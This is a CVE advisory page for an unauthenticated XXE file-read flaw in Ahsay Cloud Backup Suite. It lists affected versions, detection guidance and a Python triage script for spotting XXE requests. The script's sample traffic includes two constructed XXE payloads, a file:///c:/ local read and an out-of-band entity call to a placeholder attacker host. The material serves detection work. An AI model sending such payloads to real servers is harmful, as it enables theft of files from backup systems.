CVE-2019-10266
published 2019-07-26

Priority: P259high
CVSS 3.0: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
EXPLOIT
EPSS: 13.30% (95.9th percentile)
An issue was discovered in Ahsay Cloud Backup Suite before 8.1.1.50. When sending an out-of-bounds XML document to a URL, it is possible to read the file structure and even the content of files without authentication.

Affected

1 range

Vendor   Product              Version range           Fixed in
ahsay    cloud_backup_suite   >= 7.7.0.0 < 8.1.1.50   8.1.1.50

Detection & IOCs (extracted from sources)

URL: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
  • Monitor for unauthenticated HTTP requests containing XML payloads with DOCTYPE declarations and ENTITY references (XXE pattern) sent to Ahsay Cloud Backup Suite endpoints. The exploit sends an out-of-bounds XML document to a URL without authentication.
  • Detect out-of-band XXE exfiltration attempts: look for outbound HTTP requests from the Ahsay server to attacker-controlled hosts (e.g., http://attacker/oob) triggered by XML entity expansion, indicating file content exfiltration via OOB channel.
  • Alert on XML payloads referencing local file URIs (file:///c:/) in entity declarations, which indicates attempted local file read via XXE on Windows-based Ahsay Backup installations.
  • The vulnerability affects Ahsay Cloud Backup Suite versions 7.x through 8.1.0.50 (fixed in 8.1.1.50). Ensure version scoping is correct when deploying detections — versions at or above 8.1.1.50 are patched.
  • The exploit targets Windows-based deployments (file:///c:/) but the XXE technique can also be used to probe internal hosts, so detection should not be limited to Windows file URI schemes alone.
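Added example, not taken from the advisory sources or from the Ahsay product: a small Python triage script that applies the detection points above (DOCTYPE plus external ENTITY declarations, file:// versus out-of-band http:// targets, unauthenticated requests only) to constructed request bodies, and checks the affected-version scoping against the 7.7.0.0 to 8.1.1.50 range. The sample bodies, the `authenticated` field and the verdict labels are assumptions.

```python
import re
from typing import Optional

# Version scoping from the advisory: affected from 7.7.0.0, fixed in 8.1.1.50.
FIRST_AFFECTED = (7, 7, 0, 0)
FIXED_VERSION = (8, 1, 1, 50)

# External entity declarations (general or parameter entity, double-quoted):
#   <!ENTITY name SYSTEM "uri">   <!ENTITY % name SYSTEM "uri">   <!ENTITY name PUBLIC "id" "uri">
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]+)"',
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def is_affected(version: str) -> bool:
    """True when a reported Ahsay CBS version falls inside the advisory's affected range."""
    parsed = tuple(int(part) for part in version.split("."))
    return FIRST_AFFECTED <= parsed < FIXED_VERSION


def classify_xml_body(body: str) -> Optional[str]:
    """Label an HTTP body by XXE pattern; None when there is no DOCTYPE at all."""
    if not DOCTYPE_RE.search(body):
        return None
    uris = ENTITY_RE.findall(body)
    if not uris:
        return "doctype-only"           # DOCTYPE without external entities: low signal
    schemes = {uri.split(":", 1)[0].lower() for uri in uris}
    if "file" in schemes:
        return "xxe-local-file"         # local file read, e.g. file:///c:/ on Windows
    if schemes & {"http", "https", "ftp"}:
        return "xxe-oob"                # out-of-band exfiltration / internal host probe
    return "xxe-other"


def triage(requests: list) -> list:
    """Alert on unauthenticated requests whose body declares an external entity."""
    alerts = []
    for req in requests:
        verdict = classify_xml_body(req["body"])
        if verdict and verdict != "doctype-only" and not req.get("authenticated"):
            alerts.append({"path": req["path"], "verdict": verdict})
    return alerts


# Constructed sample traffic (not real captures); paths are placeholders.
SAMPLE_REQUESTS = [
    {"path": "/example-endpoint", "authenticated": False,
     "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///c:/">]><r>&xxe;</r>'},
    {"path": "/example-endpoint", "authenticated": False,
     "body": '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker/oob">%dtd;]><r/>'},
    {"path": "/example-endpoint", "authenticated": True,
     "body": '<?xml version="1.0"?><request><user>backup</user></request>'},
]
```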

CVSS provenance

NVD v3.0: 7.5 HIGH  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
NVD v2.0: 7.8 HIGH  AV:N/AC:L/Au:N/C:C/I:N/A:N